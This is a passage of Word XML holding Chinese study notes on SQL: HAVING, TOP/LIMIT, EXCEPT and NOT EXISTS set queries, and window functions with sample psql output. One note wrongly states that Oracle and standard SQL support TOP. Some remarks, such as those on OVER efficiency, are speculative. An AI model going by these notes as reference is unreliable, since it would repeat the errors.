        <w:t>）来实现的功能。但是</w:t>
      </w:r>
      <w:r>
        <w:t>having</w:t>
      </w:r>
      <w:r>
        <w:t>功能必须紧跟</w:t>
      </w:r>
      <w:r>
        <w:t>group by</w:t>
      </w:r>
      <w:r>
        <w:t>子句。</w:t>
      </w:r>
      <w:r>
        <w:t>having</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>COUNT</w:t>
      </w:r>
      <w:r>
        <w:t>函数放在</w:t>
      </w:r>
      <w:r>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t>后面也是会起</w:t>
      </w:r>
      <w:r>
        <w:t>group by</w:t>
      </w:r>
      <w:r>
        <w:t>之后的一样作用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">select top 1 * from xxx;  </w:t>
      </w:r>
      <w:r>
        <w:t>注意</w:t>
      </w:r>
      <w:r>
        <w:t>Oracle</w:t>
      </w:r>
      <w:r>
        <w:t>与标准</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>才支持</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t>就不支持</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>select * from xxx limit 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>集合差：</w:t>
      </w:r>
      <w:r>
        <w:t>EXCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">except </w:t>
      </w:r>
      <w:r>
        <w:t>前后查询语句的</w:t>
      </w:r>
      <w:r>
        <w:t>columns</w:t>
      </w:r>
      <w:r>
        <w:t>必须是一致的，所以一般都要结合</w:t>
      </w:r>
      <w:r>
        <w:t>except</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>交集：</w:t>
      </w:r>
      <w:r>
        <w:t>IN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:t>要求</w:t>
      </w:r>
      <w:r>
        <w:t>column</w:t>
      </w:r>
      <w:r>
        <w:t>只有一个</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>集合相等：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>两个集合互减。</w:t>
      </w:r>
      <w:r>
        <w:t>EXISTS</w:t>
      </w:r>
      <w:r>
        <w:t>就是判断一个集合是不是空</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">select Cause, Rate  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> from (  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> select Cause, Rate from A1  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> union all  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> select Cause, Rate from A2)  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> group by Cause, Rate   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">having count(*) &lt; 2  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">OVER </w:t>
      </w:r>
      <w:r>
        <w:t>子句：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>指定在聚集以后聚合函数的作用对象，所以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">OVER (PARTITION/GROUP BY </w:t>
      </w:r>
      <w:r>
        <w:t>字段名称</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>postgres=# SELECT *,COUNT(1)  over() from course;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  cno  |   cname    | ccredit | cdept | count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>-------+------------+---------+-------+-------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> 2     | </w:t>
      </w:r>
      <w:r>
        <w:t>数学</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">       |       1 | MA    |     7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> 6     | </w:t>
      </w:r>
      <w:r>
        <w:t>数据处理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   |       2 | CS    |     7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> 7     | PASCAL</w:t>
      </w:r>
      <w:r>
        <w:t>语言</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> |       6 | CS    |     7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> 5     | </w:t>
      </w:r>
      <w:r>
        <w:t>数据结构</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   |       7 | CS    |     7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> 1     | </w:t>
      </w:r>
      <w:r>
        <w:t>数据库原理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> |       5 | IS    |     7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> 3     | </w:t>
      </w:r>
      <w:r>
        <w:t>信息系统</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   |       1 | IS    |     7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> 4     | </w:t>
      </w:r>
      <w:r>
        <w:t>操作系统</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   |       6 | CS    |     7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>postgres=# SELECT *,COUNT(1)  from course;  --</w:t>
      </w:r>
      <w:r>
        <w:t>使用聚合函数需要先有聚合</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>ERROR:  column "course.cno" must appear in the GROUP BY clause or be used in an</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>aggregate function</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>行</w:t>
      </w:r>
      <w:r>
        <w:t>SELECT *,COUNT(1)  from course;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">            ^</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">SELECT name, test, score, AVG(score) OVER (PARTITION BY test) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  AS average_by_test FROM student; </w:t>
      </w:r>
      <w:r>
        <w:t>本条命令指定先按照</w:t>
      </w:r>
      <w:r>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:t>字段进行</w:t>
      </w:r>
      <w:r>
        <w:t>partition by</w:t>
      </w:r>
      <w:r>
        <w:t>，之后再计算每一个组的</w:t>
      </w:r>
      <w:r>
        <w:t>avg</w:t>
      </w:r>
      <w:r>
        <w:t>结果，显示为</w:t>
      </w:r>
      <w:r>
        <w:t>average_by_test</w:t>
      </w:r>
      <w:r>
        <w:t>表格头部。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>与单独使用</w:t>
      </w:r>
      <w:r>
        <w:t>group by</w:t>
      </w:r>
      <w:r>
        <w:t>的差别：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>在显示记录上面的条数上，如果使用</w:t>
      </w:r>
      <w:r>
        <w:t>over</w:t>
      </w:r>
      <w:r>
        <w:t>关键字就会将每一行记录都显示一次聚合函数的结果，这说明是每一行记录都会进行一次</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>group by</w:t>
      </w:r>
      <w:r>
        <w:t>操作（或者认为是每一条记录都会执行一次</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">select * from XXX where XXX='xxx' </w:t>
      </w:r>
      <w:r>
        <w:t>所以在效率上应该不行）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>postgres=# select min(score) over(partition by test) from test;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> min</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>-----</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  43</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  43</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  43</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  43</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  31</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  31</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  31</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  31</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">(8 </w:t>
      </w:r>
      <w:r>
        <w:t>行记录</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>postgres=# select min(score) from test group by test;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> min</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>-----</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  43</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  31</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">(2 </w:t>
      </w:r>
      <w:r>
        <w:t>行记录</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>postgres=# SELECT *,COUNT(1)  from course group by cno;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  cno  |   cname    | ccredit | cdept | count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>-------+------------+---------+-------+-------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> 2     | </w:t>
      </w:r>
      <w:r>
        <w:t>数学</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">       |       1 | MA    |     1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> 5     | </w:t>
      </w:r>
      <w:r>
        <w:t>数据结构</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   |       7 | CS    |     1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> 7     | PASCAL</w:t>
      </w:r>
      <w:r>
        <w:t>语言</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> |       6 | CS    |     1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> 6     | </w:t>
      </w:r>
      <w:r>
        <w:t>数据处理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   |       2 | CS    |     1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> 1     | </w:t>
      </w:r>
      <w:r>
        <w:t>数据库原理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> |       5 | IS    |     1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> 4     | </w:t>
      </w:r>
      <w:r>
        <w:t>操作系统</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   |       6 | CS    |     1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve"> 3     | </w:t>
      </w:r>
      <w:r>
        <w:t>信息系统</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   |       1 | IS    |     1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">(7 </w:t>
      </w:r>
      <w:r>
        <w:t>行记录</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>数据表、数据库以及字段的大小写都是一样的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>查询选了与指定学号学生所有课程的人：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>集合包含问题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>这是一个集合包含另外一个集合的问题，转变为集合的减法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>select sno from Student where not exists (</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>(select Cno from sc where Sno='200215122')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>except</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>(select Cno from sc where sc.Sno=Student.sno)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t>这里有点特殊就是指定的是学号，刚好连接</w:t>
      </w:r>
      <w:r>
        <w:t>sc</w:t>
      </w:r>
      <w:r>
        <w:t>已经</w:t>
      </w:r>
      <w:r>
        <w:t>student</w:t>
      </w:r>
      <w:r>
        <w:t>表之间的关系也是学号。这样子才会一个个比较，然后</w:t>
      </w:r>
      <w:r>
        <w:t>except</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>EXCEPT</w:t>
      </w:r>
      <w:r>
        <w:t>的理解很简单，就是集合的相减。两边分别是独立的。每一次执行的时候，</w:t>
      </w:r>
      <w:r>
        <w:t>Student.sno</w:t>
      </w:r>
      <w:r>
        <w:t>都会是一个固定的值，这样就是人的集合减掉人的集合。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>如果限制条件并不是表与表之间的连接关系：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>select sno,sname from student where not exists (select sc.cno from student,sc where student.sno=sc.sno and student.sname='</w:t>
      </w:r>
      <w:r>
        <w:t>王五</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">' except select sc.cno from sc where student.sno=sc.sno);  </w:t>
      </w:r>
      <w:r>
        <w:t>外面的</w:t>
      </w:r>
      <w:r>
        <w:t>student</w:t>
      </w:r>
      <w:r>
        <w:t>会影响</w:t>
      </w:r>
      <w:r>
        <w:t>except</w:t>
      </w:r>
      <w:r>
        <w:t>后面的内容，但是由于</w:t>
      </w:r>
      <w:r>
        <w:t>except</w:t>
      </w:r>
      <w:r>
        <w:t>之前需要用刀</w:t>
      </w:r>
      <w:r>
        <w:t>student</w:t>
      </w:r>
      <w:r>
        <w:t>表用于连接，所以</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>select sno,sname from student where not exists (select sc.cno from sc where student.sno=sc.sno and student.sname='</w:t>
      </w:r>
      <w:r>
        <w:t>王五</w:t>
      </w:r>
      <w:r>
        <w:t>' except select sc.cno from sc where student.sno=sc.sno);</w:t>
      </w:r>
      <w:r>
        <w:t>如果按照这种写法，那么后面两者取到的用于参加判断的</w:t>
      </w:r>
      <w:r>
        <w:t>student</w:t>
      </w:r>
      <w:r>
        <w:t>表中的记录是一样的。这就会导致结果出错，纠正办法是在</w:t>
      </w:r>
      <w:r>
        <w:t>except</w:t>
      </w:r>
      <w:r>
        <w:t>前面的子查询中增加上</w:t>
      </w:r>
      <w:r>
        <w:t>student</w:t>
      </w:r>
      <w:r>
        <w:t>表，从而分开。还有种解决办法是通过嵌套一个</w:t>
      </w:r>
      <w:r>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t>，转变为限制条件与表连接关系相同的情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>至少用了供应商</w:t>
      </w:r>
      <w:r>
        <w:t>S1</w:t>
      </w:r>
      <w:r>
        <w:t>所供应的全部零件的工程号</w:t>
      </w:r>
      <w:r>
        <w:t>JNO</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>∏JNO,PNO(SPJ) ÷ ∏PNO(σSNO='S1'(SPJ))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>select distinct JNO from SPJ TMP where not exists(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>select PNO from SPJ where SNO='S1'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">except </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>select PNO from SPJ where JNO=TMP.JNO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  mysql</w:t>
      </w:r>
      <w:r>
        <w:t>注释符有三种：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>#...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">"--  ..." </w:t>
      </w:r>
      <w:r>
        <w:t>注意</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>后面还需要有一个空格</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>/*...*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>编写程序的时候，在字符串类型比较判断加上转义的双引号还是很值得的，不然可能面临结果不全的窘境。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>这里面通过内查询创建一个临时表，这个表的使用范围只存在最外层大括号中，生存周期的话就是一整条语句</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>(select max(f) from (select sc.sno,avg(grade) as f from sc group by sc.sno having count(sc.sno)&gt;=2) as t);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t>子查询可以在</w:t>
      </w:r>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:t>的中：</w:t>
      </w:r>
      <w:r>
        <w:t>select student.sno,student.sname from student,sc where sc.sno=student.sno and sc.grade=(select MAX(grade) from sc where cno='2');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>select * from tb a  where a.</w:t>
      </w:r>
      <w:r>
        <w:t>成绩</w:t>
      </w:r>
      <w:r>
        <w:t>=(select max(</w:t>
      </w:r>
      <w:r>
        <w:t>成绩</w:t>
      </w:r>
      <w:r>
        <w:t>) from tb b where a.</w:t>
      </w:r>
      <w:r>
        <w:t>主键</w:t>
      </w:r>
      <w:r>
        <w:t>ID=b.</w:t>
      </w:r>
      <w:r>
        <w:t>主键</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ID)    tb </w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r>
        <w:t>之间有没有</w:t>
      </w:r>
      <w:r>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:t>都是一样的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>查询没有选</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>号课程的学生的学号和姓名；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">not in </w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> except </w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> not exists</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>select sno, sname</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  from student</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  where sno not in</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  ( select sno</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">      from sc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">      where cno='1');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>--or</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>(select sno, sname</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  from student)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>except</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>(select s.sno, sname</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  from student s, sc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
